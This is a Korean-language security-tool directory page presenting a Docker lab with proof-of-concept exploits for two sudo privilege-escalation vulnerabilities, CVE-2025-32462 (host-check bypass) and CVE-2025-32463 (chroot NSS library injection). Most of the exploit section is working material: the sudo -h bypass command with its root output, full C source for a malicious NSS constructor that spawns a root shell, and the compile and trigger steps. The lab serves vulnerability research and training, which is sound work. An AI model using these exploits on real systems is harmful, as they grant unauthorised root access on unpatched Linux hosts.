Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32462-CVE-2025-32463-PoC-Lab — 컨테이너 기반 랩으로, 권한 상승을 위한 두 가지 중요한 sudo 취약점(호스트 검증 우회(CVE-2025-32462) 및 chroot를 통한 NSS 라이브러리 주입(CVE-2025-32463))에 대한 개념 증명 익스플로잇이 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab
Privilege EscalationContainer SecurityVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary ExploitationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab

CVE-2025-32462-CVE-2025-32463-PoC-Lab

컨테이너 기반 랩으로, 권한 상승을 위한 두 가지 중요한 sudo 취약점(호스트 검증 우회(CVE-2025-32462) 및 chroot를 통한 NSS 라이브러리 주입(CVE-2025-32463))에 대한 개념 증명 익스플로잇이 포함되어 있습니다.

저장소 보기
21116개월 전아직 검토되지 않음

CVE-2025-32462 & CVE-2025-32463 – 고급 PoC 실습 환경

이 저장소는 두 가지 중요한 sudo 취약점에 대한 컨테이너 기반 실습 환경과 상세한 PoC를 제공합니다:

  • CVE-2025-32462 – sudo -h 호스트 일치 로직 우회
  • CVE-2025-32463 – sudo -R chroot NSS 라이브러리 탈출

연구 및 크레딧

원본 연구: Rich Mirch – Stratascale CRU
PoC 및 실습 환경: MAAYTHM


기술 개요

CVE-2025-32462 – 호스트 검증 로직 우회

Sudo는 /etc/sudoers의 Host_Alias를 통해 호스트 기반 인증을 적용합니다. 취약점은 -h 옵션이 제공될 때 발생합니다. sudo는 시스템의 정식 호스트 이름 대신 제공된 호스트 이름을 평가하므로, 제한된 사용자가 호스트 기반 sudo 정책을 우회할 수 있습니다.

영향:

  • 호스트 기반 정책 우회
  • 권한 상승
  • 무단 루트 명령 실행

CVE-2025-32463 – Chroot를 통한 NSS 주입

Sudo의 -R 옵션은 chroot 환경에서 실행을 허용합니다. 초기화 중에 /etc/nsswitch.conf를 기반으로 NSS(이름 서비스 스위치) 라이브러리가 로드됩니다. 악의적인 chroot 환경과 사용자 정의 NSS 라이브러리를 제공함으로써 공격자는 루트로 코드를 실행할 수 있습니다.

공격 표면:

  1. 제어된 chroot 파일시스템
  2. 공격자 정의 nsswitch.conf
  3. 동적으로 로드되는 사용자 정의 NSS 공유 라이브러리
  4. 생성자 코드가 상승된 권한으로 실행됨

영향:

  • 루트 권한 상승
  • chroot 컨텍스트 내 임의 코드 실행

실습 환경

  • 기본 OS: Ubuntu 24.04
  • 취약한 sudo 버전: 1.9.16p2
  • 사용자: pwn (비루트)
  • 격리: 사용자 정의 네트워크를 사용한 Docker 컨테이너

저장소 구조

CVE-2025-32462-CVE-2025-32463-PoC-Lab
├── Dockerfile
│   # 취약한 sudo 환경을 빌드합니다
│
├── exploit/
│   ├── cve_2025_32463.c
│   │   # 권한 상승에 사용되는 악성 NSS 공유 라이브러리
│   └── build.sh
│       # 익스플로잇 페이로드를 공유 NSS 모듈로 컴파일합니다
│
├── lab/
│   └── setup.sh
│       # 취약한 실습 환경 구성 및 sudoers 설정을 자동화합니다
│
└── README.md
    # 기술 문서, 취약점 분석 및 PoC 사용 가이드

전체 기술 분석, PoC 워크스루 및 익스플로잇 가이드


Docker 실습 환경 설정

FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
                       pkg-config libssl-dev git nano gcc && \
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && \
    make && make install

RUN useradd -m -s /bin/bash pwn && \
    echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

실습 환경 빌드 및 실행

docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d \
  --network sudolabnet \
  --ip 172.190.0.3 \
  --hostname lowpriv.test.local \
  --add-host highpriv.test.local:172.190.0.2 \
  --name lowpriv \
  sudo-vuln-lab tail -f /dev/null

CVE-2025-32462 – 익스플로잇

docker exec -u root -it lowpriv bash echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

정상 동작:

sudo id

Password required

익스플로잇:

sudo -h highpriv.test.local id

uid=0(root) gid=0(root) groups=0(root)

sudo -h highpriv.test.local hostname -f

lowpriv.test.local

CVE-2025-32463 – 익스플로잇

mkdir -p exploitDir/etc echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf mkdir libnss_ cp /etc/group exploitDir/etc/

악성 NSS 라이브러리:

#include <stdlib.h> #include <unistd.h>

attribute((constructor)) void GIVEMEROOT(void) { setreuid(0,0); setregid(0,0); chdir("/"); execl("/bin/bash", "/bin/bash", NULL); }

컴파일:

gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

트리거: sudo -R exploitDir

Root shell obtained

id

uid=0(root) gid=0(root)

도구 다운로드